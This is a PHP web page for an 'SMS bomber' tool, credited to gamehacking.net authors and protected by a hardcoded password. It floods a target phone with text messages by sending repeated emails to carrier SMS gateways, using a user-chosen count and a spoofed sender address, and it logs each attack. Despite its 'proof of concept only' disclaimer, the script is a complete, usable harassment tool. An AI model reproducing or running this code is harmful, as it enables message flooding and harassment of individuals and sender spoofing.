<?php
//
// PROOF OF CONCEPT ONLY NOT INTENDED TO BE USED.
//
// SMS_BOMBER: Version 3
// ORIGINAL DATE: 12-26-2010
// DEVELOPER: Heisenberg a.k.a Cancerous
// CREDITS: TheOneSage - HTML, Smith - POC
// www.gamehacking.net
//
// PROOF OF CONCEPT ONLY NOT INTENDED TO BE USED.

session_start();

$v_PASSWORD = "LETMEIN";

$v_USER_IP = $_SERVER['REMOTE_ADDR'];

$v_DATE = date( 'l jS \of F Y h:i:s A' );
$v_LOG_FILE = fopen( "BombLog.txt", a );

echo'<html>
<body bgcolor="black" text="#33ff00">
<table align="center" cellspacing="5">

<tr><td colspan=2 align="center"> <font size="6"><strong>.::: Phone Bomber - 2012 :::.</strong></font> <br /><font color="#FF0000">by <br /> TheOneSage, Cancerous and Smith</font></td></tr>';

if(( $_POST['pass_submit'] && $_POST['pass'] == $v_PASSWORD ) || $_SESSION['loggedin'] == 1 )
{
$_SESSION['loggedin'] = 1;

echo'<form action="bomber_v2.php" method="post" name="submit">
<tr><td></td></tr>

<tr>
<td align="right" width="40%">Carrier: </td>
<td>
<select name="carrier">
<option value="tmobile">T-Mobile</option>
<option value="virginmobile">Virgin Mobile</option>
<option value="cingular">ATT</option>
<option value="sprint">Sprint</option>
<option value="verizon">Verizon</option>
<option value="nextel">Nextel</option>
</select>
</td>
</tr>

<tr>
<td align="right">Number: </td>
<td><input type="text" name="number" /></td>
</tr>

<tr>
<td align="right">From: </td>
<td><input type="text" name="from" /></td>
</tr>

<tr>
<td align="right">Subject: </td>
<td><input type="text" name="sub" /></td>
</tr>

<tr>
<td align="right">Message: </td>
<td><input type="text" name="body" /></td>
</tr>

<tr>
<td align="right">Count: </td>
<td><input type="text" name="count" /></td>
</tr>

<tr>
<td colspan=2 align="center"><input type="submit" name="submit" value="BOMB IT" /></td>
</tr>
</form>';

fwrite( $v_LOG_FILE, $v_USER_IP." ACCESSED THIS TOOL ON [ ".$v_DATE." ]"."\n" );

if( $_POST['submit'] )
{
$v_NUMBER = $_POST['number'];

$v_FROM = 'MIME-Version: 1.0' . "\r\n";
$v_FROM .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$v_FROM .= 'From: ' . $_POST['from'] . '<' . $_POST['from'] . '>' . "\r\n";

$v_COUNT = $_POST['count'];
$v_SUBJECT = $_POST['sub'];
$v_BODY = $_POST['body'];
$v_CARRIER = $_POST['carrier'];

if( $v_CARRIER == "tmobile" )
$v_CARRIER = $v_NUMBER."@tmomail.net";
else if( $v_CARRIER == "virginmobile" )
$v_CARRIER = $v_NUMBER."@vmobl.com";
else if( $v_CARRIER == "cingular" )
$v_CARRIER = $v_NUMBER."@cingularme.com";
else if( $v_CARRIER == "sprint" )
$v_CARRIER = $v_NUMBER."@messaging.sprintpcs.com";
else if( $v_CARRIER == "verizon" )
$v_CARRIER = $v_NUMBER."@vtext.com";
else if( $v_CARRIER == "nextel" )
$v_CARRIER = $v_NUMBER."@nextel.com";
else
die( "Invalid Selection." );

for( $i = 0; $i < $v_COUNT; $i++ )
{
mail( $v_CARRIER, $v_SUBJECT, $v_BODY, $v_FROM );
}

fwrite( $v_LOG_FILE, $v_USER_IP." Bombed [ ".$v_NUMBER." ] On [ ".$v_DATE." ] [ ".$v_COUNT." ] Times\n" );

echo '<div align="center"><font size="6">';
echo "Bomed ".$v_NUMBER." ".$v_COUNT." times!";
echo '</font></div>';
}
}
else
{
if( $_POST['pass_submit'] )
{
if( $_POST['pass'] != "" )
{
echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>INVALID PASS!</strong></font></td></tr>';
fwrite( $v_LOG_FILE, $v_USER_IP." FAILED LOGIN ON [ ".$v_DATE." ]\n" );
}
else if( $_POST['pass'] == "" )
{
echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>ENTER A PASS!</strong></font></td></tr>';
}
}

echo'<form action="bomber_v2.php" method="post" name="pass_submit">
<tr><td></td></tr>
<tr>
<td align="center"><font color="#ffffff">Password: </font></td>
</tr>

<tr>
<td align="center"><input type="text" name="pass" /></td>
</tr>

<tr>
<td colspan=2 align="center"><input type="submit" name="pass_submit" value="Login" /></td>
</tr>
</form>';
}

echo'</table>
</body>
</html>';

?>